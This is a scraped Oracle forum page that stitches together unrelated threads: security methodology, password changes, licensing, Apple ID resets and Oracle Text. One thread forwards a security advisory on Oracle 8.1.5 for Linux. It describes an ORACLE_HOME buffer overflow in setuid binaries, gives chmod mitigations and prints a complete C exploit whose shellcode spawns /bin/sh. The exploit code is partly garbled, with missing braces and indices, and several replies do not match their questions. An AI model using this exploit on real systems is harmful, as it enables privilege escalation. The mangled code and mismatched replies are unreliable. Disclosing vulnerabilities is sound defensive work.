Security Methodology and Oracle Solution

I am wondering if Oracle has or recommends a methodology for establishment of security in the project along with its development. By security methodology I mean a guideline and phase by phase guide to establishment, implementation, monitoring and maintaining of a security assurance system.
Just to give an example, Unified Process as a methodology gives little detail on security so some researchers have come up with SecureUP (Secure Unified Process) which defines the artifacts relating to security. With the introduction of so many middleware security related tools by Oracle, it seems to me that such a methodology is necessary.
Is there anything concerning it in OUM (Oracle Unified Method)? Does Oracle RECOMMEND any methodology to be used with its tools?
Best Regards,
Farbod

Thank you Justin. You are right.
Just one point: I think that most of the software development methodologies undervalue security, for example, RUP or XP do not define phase by phase security related artifacts and procedures. Is there any security-rich methodology? I understand that Oracle provides TOOLS and security relates to SYSTEM but even these tools leave room for ASSEMBLY and they need monitoring, vulnerability analysis and best practices for testing. Will Oracle Unified Method be more enthusiastic about this?
Kind Regards,
Farbod

Similar Messages

  • Error when changing password of NW J2ee's secure store and Oracle sqlplus

    Hi all,
    I am wondering on the following:
    Current setting:
    I have "old_password" for J2ee configtool's secure store.
    I have "old_password" for Oracle's sapsr2 user inside Sqlplus.
    When I change the password for all 3 places from "old_password" to "new_password", I am not able to connect to configtool. I am also not able to start the Portal service; the logfile shows the error "invalid user/password".
    If I change the password back to "old_password", I can connect to configtool as well as start the service.
    Snote and forumers (google) mention that updating configtool's secure store and "alter user sapsr3" for the Oracle database is all I need to change the password.
    Have I missed some step in order to change the password for my Enterprise Portal?
    Thank you.
    Regards

    edit: never mind, found the meaning of SDM.
    but the command below, is it usable?
    For Windows OS:
    Open a command prompt and navigate to the folder <Drive>:\usr\sap\DP1\JC21\SDM\program
    Execute the below commands:
    sdm jstartup "mode=standalone"
    sdm changepassword "newpassword=<Enterthenewpassword>"
    sdm jstartup "mode=integrated"
    StartServer.bat
    Edited by: Sek Yao Ooi on Dec 7, 2009 9:21 AM

  • Enterprise User Security, OID and Oracle Advanced Security

    Do we also need Oracle Advanced Security when using the OID
    solution (Oracle Application Server)? I just seem to remember
    coming across something where some portion of the LDAP directory
    needed to communicate over SSL, and I wasn't sure if this
    implied that Oracle Advanced Security was needed.
    Thanks.

    Hi!
    As long as you use the LDAP via SSL purely in the Application Server then there is no need for Advanced Security.
    As you mentioned Enterprise Users - which is a database user authenticated by the OID, you will need the Advanced Security option.
    cu
    Andreas

  • Oracle RAC and Oracle Secure Backup Express

    I am building a new RAC environment - 7-Nodes on Linux.
    We are very interested in reviewing Oracle Secure Backup, possible Oracle Secure Backup Express.
    My understanding about Oracle Secure Backup Express is it is licensed "free" as long as you are working with a single tape drive.
    Does anyone know - does this apply to RAC as well?
    Thanks

    Please refer to the OSB licensing document for
    specific differences between OSB-XE and OSB:
    http://download-west.oracle.com/docs/cd/B32520_01/doc/license.101/b25528/toc.htm
    In general, we recommend you back up each RAC node to
    ensure all local files are protected, which would mean
    the OSB-XE edition would not be recommended since
    OSB-XE is backup of one server.

    Thank you - I will review this.
    .. and your White Papers regarding performance were just what I was looking for.

  • Advance Replication and Oracle Label Security

    Has anyone been able to configure both Advance Replication and Oracle Label Security to work together?

    This is currently not supported in Streams. I have an enhancement request in with Oracle for this functionality. This won't be seen in 11g R2 either.
    Has anyone done Label Security with Advance Replication?

  • I am trying to change my password, but not remember the security questions and not access recovery email. Please give me a solution.Ana Maria Cappatto Simoes/ F. 11.50414433

    Welcome to the Apple Community.
        1.    Start here (change country if necessary) and navigate to 'Password and Security', reset your security questions using the link provided, you will receive an email to your rescue address, use the link in the email and reset your security questions.
        2.    If that doesn't help, you don't receive a reset email or you don't have a rescue address, you should contact AppleCare who will initially try to assist you with a reset email or if unsuccessful will pass you to the security team to reset your security questions for you.
        3.    If you are in a region that doesn't have international telephone support try contacting Apple through iTunes Store Support.

  • Forgotten my security questions and cannot purchase any apps etc. solutions on internet with rescue e-mail don't work . Have been trying to resolve this issue for 3 days now

    If you don't have a rescue email address (or you do but aren't the receiving the email to it) then you will need to contact iTunes Support / Apple to get the questions reset.
    Contacting Apple about account security : http://support.apple.com/kb/HT5699
    When they've been reset (and if you don't already have a rescue email address) you can then use the steps half-way down this page to add a rescue email address for potential future use : http://support.apple.com/kb/HT5312

  • I forgot my security answers and i have provided rescue email same as apple id its been 6 months and still no solution found i have credits in my account please help

    Well, of course a rescue address which is the same as the main address (which doesn't work) isn't a lot of use.
    Please see Kappy's comprehensive User Tip:
    https://discussions.apple.com/docs/DOC-4551

  • I do not know the security questions and when do I apply for the questions do not come to on Emile rescue!! What is the solution..?

    If the email hasn't arrived after a few hours and isn't in a spam filter, click here, phone Apple, and ask for the Account Security team.

  • Specific courses on OLAP and oracle security

    sir
    can anyone specify on specific courses and book(s) on OLAP and oracle db security?
    thanx in advance

    OLAP: Depends entirely on what you want to accomplish - basics, tools, migrating data to, etc.
    I teach and recommend "Oracle Database 10g: Using OLAP (Data Warehousing and Oracle BI)" as a starter. Other stuff, go to http://education.oracle.com , enter 'OLAP' into the Search box and hit 'Go' button.
    Database Security: Depends entirely on what you want to accomplish, but I find Oracle University course offerings lacking in this area. (I really wish Mary Ann Davidson would do something about that, and I'd love to help.)
    The OCP Admin I and Admin II course each have a chapter discussing Security. I think these are rather simplistic for the commercial world, but most OCP candidates I see get stymied by even that level.
    The "Oracle Database 10g: Security Release 2" course is a reasonably good starting point, but few offer it. (And yes, I teach that as well)

  • I forgot my security answers and I have no rescue email, What is the solution?

    I forgot my security answers and I have no rescue email, I am trying to purchase as usuall but this time seems different, app store is asking me to answer the questions and I have no idea about the answers. WHAT TO DO? as I mentioned I have no rescue mail.

    Contact applecare support at 800-275-2273, ask for someone in account security - to reset security questions.  After the advisor verifies your identity, they can reset your security questions.
    Have a great day.

  • I have forgot the apple id security questions and i dont have rescue e mail id also pls tell me the solution

    Read here:
    http://support.apple.com/kb/ht5312
    If nothing works, either:
    Go here, ask for assistance:
    https://getsupport.apple.com/GetproductgroupList.action
    Or, call AppleCare & ask for "Account Security".

  • Solution to resetting your security questions and answers

    I had trouble resetting it 'cause apple wouldn't let me do it so I decided to call them! And they fixed it for me!
    Call at 1-800-263-3394 and they're open from 8 am till 8 pm Central. I hope this helps you out!!

    The Best Alternatives for Security Questions and Rescue Mail
         1.  Send Apple an email request at: Apple - Support - iTunes Store - Contact Us.
         2.  Call Apple Support in your country: Customer Service: Contact Apple support.
         3.  Rescue email address and how to reset Apple ID security questions.
    An alternative to using the security questions is to use 2-step verification:
    Two-step verification FAQ Get answers to frequently asked questions about two-step verification for Apple ID.

  • Security vulnerability in Oracle 8.1.5

    The following email was forwarded to me about possible security vulnerabilities.
    I am looking for verification from both Oracle and the user community.
    ================================================================================
    [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
    ================================================================================
    File : Oracle 8.1.5
    SYSTEM : LINUX
    Tested by RedHat Linux 6.2
    INFO :
    There are two security vulnerabilities in Oracle.
    1. buffer overflow
    It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
    one of the environmental value of Oracle.
    Oracle applications that are vulnerable to buffer overflow are as follow :
    - names
    - namesctl
    - onrsd
    - osslogin
    - tnslsnr
    - tnsping
    - trcasst
    - trcroute
    These applications allow an attacker to execute a buffer overflow exploit.
    2. Log-files created
    When a user executes one of Oracle applications such as names, oracle or tnslsnr,
    following log files are created.
    names
    ======
    -rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
    -rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
    -rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
    oracle
    ======
    -rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
    tnslsnr
    =======
    -rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
    SOLUTION
    Contact your vendor for a patch or close setuid permission.
    # su - oracle
    $ cd /oracle_8.1.5_install_directory/bin
    $ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
    ==-------------------------------------------------------------------------------==
    * ** ** * [email protected] [yong-jun, kim]
    * ** ** * [ http://www.hackerslab.org ]
    ******** HACKERSLAB (C) since 1999
    ==-------------------------------------------------------------------------------==
    Oracle 8.1.5 exploit
    -by loveyou
    offset value : -500 ~ +500
    #include <stdio.h>
    #include <stdlib.h>
    #define BUFFER 800
    #define NOP 0x90
    #define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
    char shellcode[] =
    /* - K2 - */
    /* main: */
    "\xeb\x1d" /* jmp callz */
    /* start: */
    "\x5e" /* popl %esi */
    "\x29\xc0" /* subl %eax, %eax */
    "\x88\x46\x07" /* movb %al, 0x07(%esi) */
    "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
    "\x89\x76\x08" /* movl %esi, 0x08(%esi) */
    "\xb0\x0b" /* movb $0x0b, %al */
    "\x87\xf3" /* xchgl %esi, %ebx */
    "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
    "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
    "\xcd\x80" /* int $0x80 */
    "\x29\xc0" /* subl %eax, %eax */
    "\x40" /* incl %eax */
    "\xcd\x80" /* int $0x80 */
    /* callz: */
    "\xe8\xde\xff\xff\xff" /* call start */
    "/bin/sh";
    unsigned long getesp(void)
    __asm__("movl %esp,%eax");
    int main(int argc, char *argv[])
    char buff, ptr,binary[120];
    long *addr_ptr, addr;
    int bsize=BUFFER;
    int i,offset;
    offset = 0 ;
    if ( argc > 1 ) offset = atoi(argv[1]);
    buff = malloc(bsize);
    addr = getesp() - 5933 - offset;
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;
    memset(buff,bsize/2,NOP);
    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode;
    buff[bsize - 1] = '\0';
    setenv("ORACLE_HOME",buff,1);
    printf("[ offset:%d buffer=%d ret:0x%x ]\n",
    offset,strlen(buff),addr);
    system(PATH);
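
A check for the workaround given in the advisory above, as an added example (not part of the forwarded advisory and not Oracle tooling): it reports which of the eight named binaries in a given bin directory still carry setuid or setgid bits. The function names and the constructed sample directory are assumptions for illustration.

```shell
#!/bin/sh
# Added example: audit the binaries named in the advisory for set-id bits.
# The list below is copied from the advisory; everything else is illustrative.
ORACLE_BINARIES="names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute"

# audit_setid DIR
# Prints "<binary> <bits>" for each listed binary that has setuid/setgid set.
# Returns 0 if none are flagged, 1 if any are, 2 if DIR is not a directory.
audit_setid() {
    bindir=$1
    if [ ! -d "$bindir" ]; then
        echo "not a directory: $bindir" >&2
        return 2
    fi
    flagged=0
    for name in $ORACLE_BINARIES; do
        path=$bindir/$name
        [ -f "$path" ] || continue          # not installed here: nothing to check
        bits=""
        if [ -u "$path" ]; then bits="setuid"; fi
        if [ -g "$path" ]; then bits="${bits:+$bits,}setgid"; fi
        if [ -n "$bits" ]; then
            echo "$name $bits"
            flagged=1
        fi
    done
    return $flagged
}

# make_sample_bindir
# Builds a throwaway directory of empty files standing in for a bin directory
# (constructed sample, not a real Oracle install) and prints its path.
make_sample_bindir() {
    d=$(mktemp -d) || return 1
    for name in names tnslsnr tnsping trcasst sqlplus; do
        : > "$d/$name"
        chmod 755 "$d/$name"
    done
    chmod u+s "$d/names" "$d/tnslsnr"       # still carrying the set-id bit
    chmod u+s "$d/sqlplus"                  # not on the advisory list: ignored
    echo "$d"
}

# Stand-alone use: sh audit.sh /path/to/oracle/bin
if [ $# -gt 0 ]; then
    audit_setid "$1"
fi
```

A non-zero exit status from `audit_setid` means the advisory's `chmod a-s` step has not been applied to every listed binary in that directory.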

    Hi Peter,
    I was told that Oracle8 and Oracle8i Parallel Server on IBM
    RS/6000 AIX comes with its own Lock Manager and this LM does not
    rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
    Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
    (Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
    HACMP but came with a special LM.)
    Cluster-wide Filesystems are not used for OPS on Unix, as far as
    I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
    must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
    Logical Volumes on AIX).
    So I guess it should be possible for Oracle to port OPS to Linux.
    No special Cluster-Services would be needed for OPS on Linux,
    just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
    100BaseT).
    Peter Sechser (guest) wrote:
    : Dave,
    : Parallel Server needs some cluster services in order to
    : communicate between several nodes. So, the operating system has
    : to offer things like inter-node communication services,
    : cluster-wide lock communication services and a clusterwide
    : filesystem. I'm not quite sure, to what degree Linux offers/will
    : offer these services.
    : Peter

  • Security when using oracle text

    Hello,
    We would like to use Oracle text functionality on Oracle 10 but the System Admin told us that Oracle is accessing the filesystem with the user account who launched the oracle instance.
    He told us that this is a security problem : giving oracle password gives access to the file system.
    Is that true and is there a solution to make oracle connect to the filesystem with another linux user account ?
    Thanks a lot !

    raford wrote:
    This only applies when you use the FILE_DATASTORE to index documents on disk, rather than in the file system.
    You can restrict access to this feature by only allowing users having a specific role to use it - see
    http://download.oracle.com/docs/cd/B28359_01/text.111/b28304/cdatadic.htm#BHCBIFEA
    (NB. this is in the 11g documentation - I can't find it in the 10g manual but the functionality is the same).
    It's the database process itself which accesses the files, so it will always access them as the owner of the database process, there's no way to change that.

    What do you mean when you said " FILE_DATASTORE to index documents on disk, rather than in the file system" ?
